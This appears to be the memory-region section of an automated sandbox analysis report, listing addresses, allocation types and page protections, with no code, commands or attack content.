trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
2494D000
trusted library allocation
page read and write
2494F000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
2483D000
trusted library allocation
page read and write
3220000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
266F0000
heap
page read and write
26C6F000
trusted library allocation
page read and write
2566F000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
275D0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
6BE5000
heap
page execute and read and write
26C60000
trusted library allocation
page read and write
2406E000
stack
page read and write
25795000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
4AC0000
trusted library allocation
page read and write
27560000
trusted library allocation
page execute and read and write
73CE000
stack
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
2668D000
trusted library allocation
page read and write
700000
heap
page read and write
248D5000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
7FAE000
stack
page read and write
269B0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26A4B000
heap
page read and write
2421E000
stack
page read and write
266B0000
trusted library allocation
page read and write
25A63000
trusted library allocation
page read and write
2676A000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
44E000
unkown
page read and write
6B40000
direct allocation
page read and write
27470000
trusted library allocation
page read and write
24707000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
23C30000
direct allocation
page read and write
269B0000
trusted library allocation
page read and write
26A92000
heap
page read and write
B72B000
direct allocation
page execute and read and write
752000
heap
page read and write
275A0000
trusted library allocation
page read and write
27430000
trusted library allocation
page execute and read and write
27440000
trusted library allocation
page read and write
6B30000
direct allocation
page read and write
25B29000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
8BE0000
direct allocation
page read and write
269B0000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
2FFD000
trusted library allocation
page execute and read and write
26750000
trusted library allocation
page read and write
256E5000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
744D000
stack
page read and write
27590000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
A40000
direct allocation
page read and write
992B000
direct allocation
page execute and read and write
841A000
heap
page read and write
3210000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
8D0D000
heap
page read and write
26740000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
26C70000
trusted library allocation
page read and write
22BE000
stack
page read and write
24742000
trusted library allocation
page read and write
822E000
stack
page read and write
27590000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
24558000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
2667E000
trusted library allocation
page read and write
AD2B000
direct allocation
page execute and read and write
26C60000
trusted library allocation
page read and write
2481F000
trusted library allocation
page read and write
8CB9000
heap
page read and write
269B0000
trusted library allocation
page read and write
27590000
trusted library allocation
page read and write
2453C000
stack
page read and write
2673D000
stack
page read and write
25AD6000
trusted library allocation
page read and write
86B0000
trusted library allocation
page execute and read and write
26686000
trusted library allocation
page read and write
24340000
remote allocation
page read and write
269B0000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
25B5D000
trusted library allocation
page read and write
976000
heap
page read and write
8CD1000
heap
page read and write
40A000
unkown
page write copy
266D0000
trusted library allocation
page read and write
3222000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
2480B000
trusted library allocation
page read and write
266F0000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
273AE000
stack
page read and write
26C60000
trusted library allocation
page read and write
990000
direct allocation
page read and write
50AB000
remote allocation
page execute and read and write
257CB000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
24850000
trusted library allocation
page read and write
27470000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
7FEE000
stack
page read and write
256D7000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
A10000
direct allocation
page read and write
2484B000
trusted library allocation
page read and write
26811000
heap
page read and write
256DD000
trusted library allocation
page read and write
5AC9000
trusted library allocation
page read and write
25AFE000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
266E6000
trusted library allocation
page read and write
26750000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
8AF0000
direct allocation
page read and write
8070000
trusted library allocation
page read and write
6ADD000
stack
page read and write
26740000
trusted library allocation
page read and write
26C60000
trusted library allocation
page read and write
27570000
trusted library allocation
page read and write
266D0000
trusted library allocation
page read and write
26C50000
trusted library allocation
page execute and read and write
408000
unkown
page readonly
26C60000
trusted library allocation
page read and write
27430000
trusted library allocation
page read and write
490000
heap
page read and write
269D0000
heap
page read and write
6DF0000
heap
page read and write
26C60000
trusted library allocation
page read and write
2442A000
stack
page read and write
489E000
stack
page read and write
259B5000
trusted library allocation
page read and write
71D7000
heap
page read and write
24841000
trusted library allocation
page read and write
26760000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
4A61000
trusted library allocation
page read and write
451000
unkown
page readonly
26740000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
266E0000
trusted library allocation
page read and write
2462E000
stack
page read and write
2490B000
trusted library allocation
page read and write
7490000
trusted library allocation
page read and write
269C0000
heap
page execute and read and write
23C00000
direct allocation
page read and write
401000
unkown
page execute read
266E0000
trusted library allocation
page read and write
7F30000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
27550000
trusted library allocation
page read and write
737000
heap
page read and write
3200000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
26740000
trusted library allocation
page read and write
82B0000
trusted library allocation
page read and write
80A0000
trusted library allocation
page read and write
27440000
trusted library allocation
page read and write
8AB0000
heap
page read and write
64AB000
remote allocation
page execute and read and write
26A0E000
heap
page read and write
8CCC000
heap
page read and write
8000000
trusted library allocation
page execute and read and write
There are 862 hidden memdumps, click here to show them.